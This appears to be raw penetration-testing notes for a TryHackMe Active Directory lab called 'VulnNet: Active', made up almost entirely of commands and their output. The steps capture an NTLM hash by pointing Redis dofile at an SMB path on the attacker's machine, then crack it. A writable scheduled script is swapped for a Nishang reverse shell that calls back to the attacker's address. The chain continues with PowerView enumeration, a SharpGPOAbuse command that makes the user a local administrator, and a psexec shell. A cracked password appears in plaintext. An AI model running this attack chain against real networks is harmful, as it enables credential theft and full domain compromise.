(error) ERR Error running script (call to f_df72500a0c02a7d5e1d237a6ec4408ed87f17e68): @user_script:1: C:/Windows/System32/drivers/etc/Hosts:2: unexpected symbol near '#'
(0.78s)
10.10.22.71:6379> EVAL "dofile('C:/Users/enterprise-security/Desktop/user.txt')" 0
(error) ERR Error running script (call to f_eebcad8707d6acaa5a1f5511b5d88676a90438d6): @user_script:1: C:/Users/enterprise-security/Desktop/user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e'
smb credentials capturing
Received in redis
EVAL "dofile('//10.9.191.227/test')" 0
(error) ERR Error running script (call to f_22a952acc4988c1dd72b11707328075e3b1081bb): @user_script:1: cannot open //10.9.191.227/test: Permission denied
(0.73s)
Received in responder
[SMB] NTLMv2-SSP Client : 10.10.22.71
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash : enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000
hashcracking
haiti 'enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000'
NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]
john --format=netntlmv2 -w=/usr/share/wordlists/rockyou.txt /home/kali/thm/vulnnetactive/hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498 (enterprise-security)
1g 0:00:00:01 DONE (2024-02-07 21:14) 0.5434g/s 2181Kp/s 2181Kc/s 2181KC/s sandoval69..sand36
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
smb enumeration (authenticated)
smbclient
smbclient -U enterprise-security -L ////10.10.141.42\\
Password for [WORKGROUP\enterprise-security]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.141.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbmap
smbmap -u enterprise-security -p sand_0873959498 -H 10.10.141.42 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.141.42:445 Name: 10.10.141.42 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Enterprise-Share READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
nullinux https://github.com/m8sec/nullinux
nullinux -shares -u enterprise-security -p sand_0873959498 10.10.141.42
Starting nullinux v5.5.0dev | 02-07-2024 21:45
[*] Enumerating Shares for: 10.10.141.42
Shares Comments
-------------------------------------------
\\10.10.141.42\ADMIN$ Remote Admin
\\10.10.141.42\C$ Default share
\\10.10.141.42\Enterprise-Share
\\10.10.141.42\IPC$
\\10.10.141.42\NETLOGON Logon server share
\\10.10.141.42\SYSVOL Logon server share
[*] Enumerating: \\10.10.141.42\Enterprise-Share
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
[*] Enumerating: \\10.10.141.42\NETLOGON
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
[*] Enumerating: \\10.10.141.42\SYSVOL
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
[*] 0 unique user(s) identified
smbclient
smbclient -I 10.10.141.42 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.141.42\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
9558271 blocks of size 4096. 5160889 blocks available
smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
crackmapexec
crackmapexec smb 10.10.4.22 -u 'enterprise-security' -p 'sand_0873959498' --shares
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [+] vulnnet.local\enterprise-security:sand_0873959498
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [+] Enumerated shares
SMB 10.10.4.22 445 VULNNET-BC3TCK1 Share Permissions Remark
SMB 10.10.4.22 445 VULNNET-BC3TCK1 ----- ----------- ------
SMB 10.10.4.22 445 VULNNET-BC3TCK1 ADMIN$ Remote Admin
SMB 10.10.4.22 445 VULNNET-BC3TCK1 C$ Default share
SMB 10.10.4.22 445 VULNNET-BC3TCK1 Enterprise-Share READ
SMB 10.10.4.22 445 VULNNET-BC3TCK1 IPC$ READ Remote IPC
SMB 10.10.4.22 445 VULNNET-BC3TCK1 NETLOGON READ Logon server share
SMB 10.10.4.22 445 VULNNET-BC3TCK1 SYSVOL READ Logon server share
------------------
crackmapexec smb 10.10.4.22 -u 'enterprise-security' -p 'sand_0873959498' -M spider_plus
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [+] vulnnet.local\enterprise-security:sand_0873959498
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] Started spidering plus with option:
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] DIR: ['print$']
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] SIZE: 51200
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] OUTPUT: /tmp/cme_spider_plus
------------------
cat /tmp/cme_spider_plus/10.10.4.22.json
{
"Enterprise-Share": {
"PurgeIrrelevantData_1826.ps1": {
"atime_epoch": "2021-02-23 19:33:18",
"ctime_epoch": "2021-02-23 17:45:41",
"mtime_epoch": "2021-02-23 19:33:18",
"size": "69 Bytes"
}
},
"IPC$": {
"Ctx_WinStation_API_service": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"InitShutdown": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"LSM_API_service": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"PSHost.133518828072297203.2852.DefaultAppDomain.powershell": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"PSHost.133518828426402395.3444.DefaultAppDomain.powershell": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"RpcProxy\\49669": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"RpcProxy\\593": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"SessEnvPublicRpc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"TermSrv_API_service": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"W32TIME_ALT": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"Winsock2\\CatalogChangeListener-2a8-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-2f8-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-304-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-304-1": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-380-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-3dc-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-424-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-8b0-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-914-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-938-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"atsvc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"c15a459688cdcf5a": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"epmapper": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"eventlog": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"lsass": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "9 Bytes"
},
"netdfs": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"ntsvcs": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"scerpc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"spoolss": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"srvsvc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "5 Bytes"
},
"winreg": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"wkssvc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "6 Bytes"
}
},
"NETLOGON": {},
"SYSVOL": {
"vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2021-02-23 04:36:27",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 18:08:53",
"size": "22 Bytes"
},
"vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2021-02-23 04:30:36",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 18:08:53",
"size": "1.07 KB"
},
"vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2021-02-23 04:36:27",
"ctime_epoch": "2021-02-23 04:36:27",
"mtime_epoch": "2021-02-23 18:08:53",
"size": "2.72 KB"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2021-02-23 19:14:52",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 19:14:52",
"size": "22 Bytes"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2021-02-23 17:00:15",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 18:09:46",
"size": "3.75 KB"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2021-02-23 19:14:52",
"ctime_epoch": "2021-02-23 19:14:52",
"mtime_epoch": "2021-02-23 19:14:52",
"size": "160 Bytes"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
"atime_epoch": "2021-02-23 19:14:52",
"ctime_epoch": "2021-02-23 19:14:52",
"mtime_epoch": "2021-02-23 19:14:52",
"size": "554 Bytes"
}
}
}
shell access
Considering the naming of the "PurgeIrrelevantData_1826.ps1" file and the fact that we have READ/WRITE access, maybe that file is part of a scheduled task Download this https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 Add "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.191.227 -Port 4321" at the end of the script Upload it with name "PurgeIrrelevantData_1826.ps1"
smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.8 kb/s) (average 1.8 kb/s)
smb: \> exit
------------
Get reverse shell
rlwrap nc -lnvp 4321
listening on [any] 4321 ...
ls
connect to [10.9.191.227] from (UNKNOWN) [10.10.69.113] 49909
Windows PowerShell running as user enterprise-security on VULNNET-BC3TCK1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\enterprise-security\Downloads>
Directory: C:\Users\enterprise-security\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2021 2:29 PM nssm-2.24-101-g897c7ad
d----- 2/26/2021 12:14 PM Redis-x64-2.8.2402
-a---- 2/26/2021 10:37 AM 143 startup.bat
PS C:\Users\enterprise-security\Downloads> whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Privilege escalation
PS C:\Users\enterprise-security\Downloads> netstat -a -p TCP -o
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:88 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:135 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:389 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:445 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:464 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:593 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:636 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3268 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3269 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3389 VULNNET-BC3TCK1SHNQ:0 LISTENING 832
TCP 0.0.0.0:5985 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:6379 VULNNET-BC3TCK1SHNQ:0 LISTENING 384
TCP 0.0.0.0:9389 VULNNET-BC3TCK1SHNQ:0 LISTENING 2276
TCP 0.0.0.0:47001 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:49664 VULNNET-BC3TCK1SHNQ:0 LISTENING 636
TCP 0.0.0.0:49665 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49666 VULNNET-BC3TCK1SHNQ:0 LISTENING 1028
TCP 0.0.0.0:49667 VULNNET-BC3TCK1SHNQ:0 LISTENING 836
TCP 0.0.0.0:49669 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49670 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49684 VULNNET-BC3TCK1SHNQ:0 LISTENING 2232
TCP 0.0.0.0:49694 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 0.0.0.0:49699 VULNNET-BC3TCK1SHNQ:0 LISTENING 752
TCP 0.0.0.0:49710 VULNNET-BC3TCK1SHNQ:0 LISTENING 2352
TCP 10.10.69.113:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 10.10.69.113:139 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49704 ESTABLISHED 764
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49708 ESTABLISHED 764
TCP 10.10.69.113:49704 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49708 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49909 ip-10-9-191-227:4321 ESTABLISHED 3968
TCP 10.10.69.113:49986 VULNNET-BC3TCK1SHNQ:49669 TIME_WAIT 0
TCP 127.0.0.1:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
------------------------------
Get powerview and upload it
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
--2024-02-08 13:34:20-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[============================================================================>] 752.23K 2.60MB/s in 0.3s
2024-02-08 13:34:21 (2.60 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PowerView.ps1
putting file PowerView.ps1 as \PowerView.ps1 (759.1 kb/s) (average 759.1 kb/s)
---------
Import module
PS C:\Users\enterprise-security\Downloads> Import-Module C:\Enterprise-Share\PowerView.ps1
PS C:\Users\enterprise-security\Downloads> Get-DomainGPO
usncreated : 5672
systemflags : -1946157056
displayname : security-pol-vn
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 2/23/2021 11:09:44 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 20506
dscorepropagationdata : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 3
instancetype : 4
objectguid : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 2/24/2021 12:14:52 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 24594
dscorepropagationdata : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 4
instancetype : 4
objectguid : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
-------------------
smbclient -I 10.10.49.44 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.49.44\sysvol'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
9558271 blocks of size 4096. 5157762 blocks available
smb: \> cd vulnnet.local\Policies
smb: \vulnnet.local\Policies\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Tue Feb 23 04:30:37 2021
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Tue Feb 23 04:30:37 2021
9558271 blocks of size 4096. 5157753 blocks available
smb: \vulnnet.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
GPT.INI A 22 Tue Feb 23 04:36:27 2021
MACHINE D 0 Tue Feb 23 16:58:25 2021
USER D 0 Tue Feb 23 04:30:37 2021
Download SharpGPOAbuse and put it inside machine
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "makemeadmin" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN" --Force
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Modifying \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
----
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 3:01:37 PM
Password expires Never
Password changeable 2/24/2021 3:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/8/2024 11:10:09 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
--------
python psexec.py enterprise-security:sand_0873959498@10.10.49.44
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.49.44.....
[*] Found writable share ADMIN$
[*] Uploading file qludKPxL.exe
[*] Opening SVCManager on 10.10.49.44.....
[*] Creating service cvAd on 10.10.49.44.....
[*] Starting service cvAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
